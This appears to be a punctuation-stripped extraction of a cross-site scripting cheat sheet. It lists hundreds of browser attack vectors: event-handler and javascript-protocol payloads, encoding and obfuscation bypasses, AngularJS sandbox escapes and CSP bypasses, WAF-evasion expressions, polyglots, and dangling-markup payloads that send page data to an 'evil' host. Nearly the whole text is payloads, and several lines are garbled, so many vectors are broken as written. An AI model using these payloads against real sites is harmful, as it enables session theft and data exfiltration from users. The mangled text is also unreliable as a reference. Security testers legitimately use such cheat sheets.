ltscriptgtnew Function`X$documentlocationhashsubstr`1``ltscriptgt
No parentheses or spaces using template stringsand location hash
ltscriptgtFunction`X$documentlocationhashsubstr`1````ltscriptgt
Frameworks
Bootstrap onanimationstart event ltxss class=progress-bar-animated onanimationstart=alert(1)gt
Bootstrap ontransitionend event ltxss class=carousel slide data-ride=carousel data-interval=100 ontransitionend=alert(1)gtltxss class=carousel-innergtltxss class=carousel-item activegtltxssgtltxss class=carousel-itemgtltxssgtltxssgtltxssgt
Protocols
Iframe src attribute JavaScript protocol ltiframe src=javascriptalert(1)gt
Object data attribute with JavaScript protocol ltobject data=javascriptalert(1)gt
Embed src attribute with JavaScript protocol ltembed src=javascriptalert(1)gt
A standard JavaScript protocol lta href=javascriptalert(1)gtXSSltagt
The protocol is not case sensitive lta href=JaVaScriptalert(1)gtXSSltagt
Characters x01-x20 are allowed before the protocol lta href= javascriptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed inside theprotocol
lta href=javas criptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed after protocolname before the colon
lta href=javascript alert(1)gtXSSltagt
Xlink namespace inside SVG with JavaScriptprotocol
ltsvggtlta xlinkhref=javascriptalert(1)gtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using values ltsvggtltanimate xlinkhref=xss attributeName=href values=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using to ltsvggtltanimate xlinkhref=xss attributeName=href from=javascriptalert(1) to=1 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
to 1 a id xss text x 20 y 20 XSS text a
SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt
SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt
SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt
Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt
Base tag with JavaScript protocol rewriting relativeURLS
ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt
MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah
Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS
Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt
Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt
Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt
Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Other useful attributes
Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt
Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt
Click a submit element from anywhere on the pageeven outside the form
ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt
Hidden inputs Access key attributes can enableXSS on normally unexploitable elements
ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements Access key attributes can enableXSS on normally unexploitable elements
ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the currentwebpage
lta href= download=filenamehtmlgtTestltagt
Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt
Set windowname via parameter on the windowopenfunction
lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt
Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp
Set do a e a a e att bute a a e
tagcontext=js_string_singleampx=27eval(name)gtltiframegt
Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt
Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt
Set windowname via usemap attribute in a ltimggttag
ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt
Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt
Set windowname via formtarget attribute in altinputgt tag type submit
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt
Set windowname via formtarget attribute in altinputgt tag type image
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt
Special tags
Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt
Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 1
+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 2
+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 3
+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 4
+v +ADw-script+AD4-alert(1)+ADw-script+AD4-
Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt
Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt
Disable referer ltmeta name=referrer content=no-referrergt
Encoding
Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
